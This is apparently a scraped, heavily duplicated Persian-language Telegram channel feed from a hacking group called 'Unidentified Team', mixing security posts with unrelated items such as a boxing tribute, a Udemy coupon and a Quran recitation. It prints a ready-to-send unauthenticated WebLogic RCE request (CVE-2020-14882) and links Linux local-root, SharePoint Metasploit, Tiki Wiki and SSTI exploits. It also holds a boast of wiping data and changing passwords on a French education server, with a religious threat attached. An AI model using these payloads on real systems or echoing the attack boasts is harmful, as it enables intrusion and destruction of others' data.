ابزار LARE برای انجام عملیات pivoting بر روی لینوکسی که دسترسی به اینترنت نداره. این ابزار با استفاده از localroot سطح دسترسی رو بالا میبره.
https://github.com/EnigmaDimitri/LARE
#linux
@UNIDENTIFIED_TM
https://github.com/EnigmaDimitri/LARE
#linux
@UNIDENTIFIED_TM
آسیب پذیری RCE در weblogic
بدون نیاز به احراز هویت
CVE-2020–14882
http://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal
POST:
_nfpb=true&_pageLabel=&handle=http://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)
https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
#weblogic
#rce
#java
@UNIDENTIFIED_TM 🌹
بدون نیاز به احراز هویت
CVE-2020–14882
http://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal
POST:
_nfpb=true&_pageLabel=&handle=http://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)
https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
#weblogic
#rce
#java
@UNIDENTIFIED_TM 🌹
آسیب پذیری عجیب Tiki Wiki Cms Groupware
CVE-2020-15906
https://github.com/S1lkys/CVE-2020-15906
بعد از بروت فورس و قفل شدن اکانت ادمین، امکان ورود با پسورد خالی فراهم میشود!
#web
#pentest
#writeup
@UNIDENTIFIED_TM
CVE-2020-15906
https://github.com/S1lkys/CVE-2020-15906
بعد از بروت فورس و قفل شدن اکانت ادمین، امکان ورود با پسورد خالی فراهم میشود!
#web
#pentest
#writeup
@UNIDENTIFIED_TM
Unidentified T E A M
شرح آسیب پذیری Zerologon که با سوء استفاده از NetLogon مهاجم را به دامین کنترلر میرساند https://www.tenable.com/blog/cve-2020-1472-zerologon-vulnerability-in-netlogon-could-allow-attackers-to-hijack-windows https://www.secura.com/pathtoimg.php?id=2055 …
‼️ مدیران شبکه ای که هنوز ویندوز سرور 2008R2 دارند توجه فرمایند !!!
▪️ ماژول امنیتی ضد حمله IDS که در ویدئوهای حملات Zerologon هفته گذشته قدرت آن را مشاهده کردید به صورت پیش فرض در ویندوز های 2008R2 فعال نیست و باید طبق راهنمای زیر حتما به صورت دستی بر روی سرورهای شما فعال شود. همچنین این ماژول در برخی موارد بعد از ارتقای نسخه ESET File Security باید مجدد طبق همین راهنما فعال شود !!!
‼️ با توجه به اینکه وصله کردن آسیب پذیری Zerologon در ویندوز 2008R2 با دشواری های خاص خود همراه است فعال نبودن IDS همانند این ویدئو منجر به هک شدن کامل سرور خواهد شد.
▪️ اکیدا توصیه میکنیم در اولین فرصت و با توجه به اینکه دیگر آپدیت های امنیتی توسط Microsoft برای این ویندوز ارائه نمیشود ، نسبت به ارتقای این سرور های منسوخ اقدام فرمائید.
@UNIDENTIFIED_TM
▪️ ماژول امنیتی ضد حمله IDS که در ویدئوهای حملات Zerologon هفته گذشته قدرت آن را مشاهده کردید به صورت پیش فرض در ویندوز های 2008R2 فعال نیست و باید طبق راهنمای زیر حتما به صورت دستی بر روی سرورهای شما فعال شود. همچنین این ماژول در برخی موارد بعد از ارتقای نسخه ESET File Security باید مجدد طبق همین راهنما فعال شود !!!
‼️ با توجه به اینکه وصله کردن آسیب پذیری Zerologon در ویندوز 2008R2 با دشواری های خاص خود همراه است فعال نبودن IDS همانند این ویدئو منجر به هک شدن کامل سرور خواهد شد.
▪️ اکیدا توصیه میکنیم در اولین فرصت و با توجه به اینکه دیگر آپدیت های امنیتی توسط Microsoft برای این ویندوز ارائه نمیشود ، نسبت به ارتقای این سرور های منسوخ اقدام فرمائید.
@UNIDENTIFIED_TM
Unidentified T E A M
Video
حرف های شنیدنی
زنده یاد محمد علی کلی
بوکسور حرفه ای سنگین وزن آمریکایی
برترین مشت زن تاریخ بوکس
ازمهمترین و برترین شخصیت ورزشی قرن بیست...
@UNIDENTIFIED_TM
#پست_موقت
از دست ندید
زنده یاد محمد علی کلی
بوکسور حرفه ای سنگین وزن آمریکایی
برترین مشت زن تاریخ بوکس
ازمهمترین و برترین شخصیت ورزشی قرن بیست...
@UNIDENTIFIED_TM
#پست_موقت
از دست ندید
"To All Governments of the World, We are watching you , we can see what you're doing, we control you , we are everywhere."
All data formatted!!
And ch pass :/
Edu server *
France 🇫🇷
توهین به مسلمانان جهان
عاقبت خوشی رو برای شما ندارد !
@UNIDENTIFIED_TM 🇮🇷
All data formatted!!
And ch pass :/
Edu server *
France 🇫🇷
توهین به مسلمانان جهان
عاقبت خوشی رو برای شما ندارد !
@UNIDENTIFIED_TM 🇮🇷
ISIS-Routing-Protocol(UnidentifiedTeam).pdf
1.3 MB
آموزش پیاده سازی و نحوه عملکرد پروتکل مسیریابی ISIS بر روی روتر های سیسکو.
این آموزش به صورت کاملا اختصاصی توسط تیم Unidentified برای شما دوستان عزیز آماده شده است.
@Unidentified_TM
این آموزش به صورت کاملا اختصاصی توسط تیم Unidentified برای شما دوستان عزیز آماده شده است.
@Unidentified_TM
Unidentified T E A M
https://www.udemy.com/course/learn-python-programming-from-a-z/?couponCode=32864F3DAC3F7534AF84
100% تخفیف برای دوره پایتون
علاقه مندان از دست ندید فقط کافیه لینکو باز کنید و اکانت udemy بسازید و دوره رو ادد کنید
@unidentified_tm
علاقه مندان از دست ندید فقط کافیه لینکو باز کنید و اکانت udemy بسازید و دوره رو ادد کنید
@unidentified_tm
دور زدن فایروال akamai و اجرای حمله ی SSTI
https://cyc10n3.medium.com/rce-via-server-side-template-injection-ad46f8e0c2ae
#ssti
#rce
#akamai
@UNIDENTIFIED_TM 🌹
https://cyc10n3.medium.com/rce-via-server-side-template-injection-ad46f8e0c2ae
#ssti
#rce
#akamai
@UNIDENTIFIED_TM 🌹
ماژول متاسپلویت برای آسیب پذیری ssi در sharepoint
CVE-2020-16952
https://github.com/wvu-r7/metasploit-framework/blob/feature/sharepoint/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
جزییات بیشتر:
https://github.com/rapid7/metasploit-framework/pull/14265
#windows
#sharepoint
#ssi
@UNIDENTIFIED_TM
CVE-2020-16952
https://github.com/wvu-r7/metasploit-framework/blob/feature/sharepoint/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
جزییات بیشتر:
https://github.com/rapid7/metasploit-framework/pull/14265
#windows
#sharepoint
#ssi
@UNIDENTIFIED_TM
GitHub
Add SharePoint Server-Side Include (SSI) and ViewState RCE (CVE-2020-16952) by wvu · Pull Request #14265 · rapid7/metasploit-framework
Please see @stevenseeley's advisory and exploit.
Metasploit module
msf6 exploit(windows/http/sharepoint_ssi_viewstate) > info
Name: Microsoft SharePoint Server-Side Include and ViewS...
Metasploit module
msf6 exploit(windows/http/sharepoint_ssi_viewstate) > info
Name: Microsoft SharePoint Server-Side Include and ViewS...
Unidentified T E A M
https://youtu.be/aDThTplL5IY
تماشا کردن این ویدیو خالی از لطف نیست برای آگاهی خودتون هم که شده نگا کنید🌹
نتیجه اعتماد 😊
ادمین کردیم اعضا از رو پاک کرد
به بزرگی خودتون ببخشید
لینک کانال رو به دوستان بفرستید
امیدوارم این پوزش منو پذیرا باشید🌹
@UNIDENTIFIED_TM
ادمین کردیم اعضا از رو پاک کرد
به بزرگی خودتون ببخشید
لینک کانال رو به دوستان بفرستید
امیدوارم این پوزش منو پذیرا باشید🌹
@UNIDENTIFIED_TM
Unidentified T E A M
نتیجه اعتماد 😊 ادمین کردیم اعضا از رو پاک کرد به بزرگی خودتون ببخشید لینک کانال رو به دوستان بفرستید امیدوارم این پوزش منو پذیرا باشید🌹 @UNIDENTIFIED_TM
سلام خدمت دوستان
تمامی ۳۰۰ نفر که ریمو شدن
من از لیست سیاه پاک کردم و دوباره میتونن عضو بشن لطفا یبارم شما کمک کنید دوستان و اشنایان که ریمو شدن به جمع ما بپیوندن و از کسایی که کانال دارن لینک کانال رو به اشتراک بزارن
ممنون میشیم
تا الان هرکاری صورت گرفته داخل این مجموعه کوچیک همگی ما هدفمون بالا بردن سطح علم و کمک به مردم عزیز ایران وشماس
این #تبلیغ نیست هرکس حمایت کنه محبت میکنه و جبران میکنیم
خلاصه تا جایی ما کمک کردیم به شما الان وقت اینه شما خودتون نشون بدید🌹 جبران میشه خلاصه
تمامی ۳۰۰ نفر که ریمو شدن
من از لیست سیاه پاک کردم و دوباره میتونن عضو بشن لطفا یبارم شما کمک کنید دوستان و اشنایان که ریمو شدن به جمع ما بپیوندن و از کسایی که کانال دارن لینک کانال رو به اشتراک بزارن
ممنون میشیم
تا الان هرکاری صورت گرفته داخل این مجموعه کوچیک همگی ما هدفمون بالا بردن سطح علم و کمک به مردم عزیز ایران وشماس
این #تبلیغ نیست هرکس حمایت کنه محبت میکنه و جبران میکنیم
خلاصه تا جایی ما کمک کردیم به شما الان وقت اینه شما خودتون نشون بدید🌹 جبران میشه خلاصه
Forwarded from صدای بهشت استاد عبدالباسط
✳️ با این دو اجرای عبدالباسط, انگار تو آغوش خدا نشستی و داره نوازشت میکنه...
🔹 دو فراز از شاهکارهای استاد یکی در اوج جوانی (۱۹۵۶) و یکی در اوج پیری (۱۹۸۸)
🌟 از این پست ساده عبور نکنید
❤️ بفرستید برای دوستانتون تا بقیه عزیزان هم طعم این آرامش واقعی رو بچشن و گوارای وجودشون کنن..
🆔 @abdulbasetquran
➡️ https://t.me/joinchat/AAAAAD6iQBbByqpLkhkXwQ
🔹 دو فراز از شاهکارهای استاد یکی در اوج جوانی (۱۹۵۶) و یکی در اوج پیری (۱۹۸۸)
🌟 از این پست ساده عبور نکنید
❤️ بفرستید برای دوستانتون تا بقیه عزیزان هم طعم این آرامش واقعی رو بچشن و گوارای وجودشون کنن..
🆔 @abdulbasetquran
➡️ https://t.me/joinchat/AAAAAD6iQBbByqpLkhkXwQ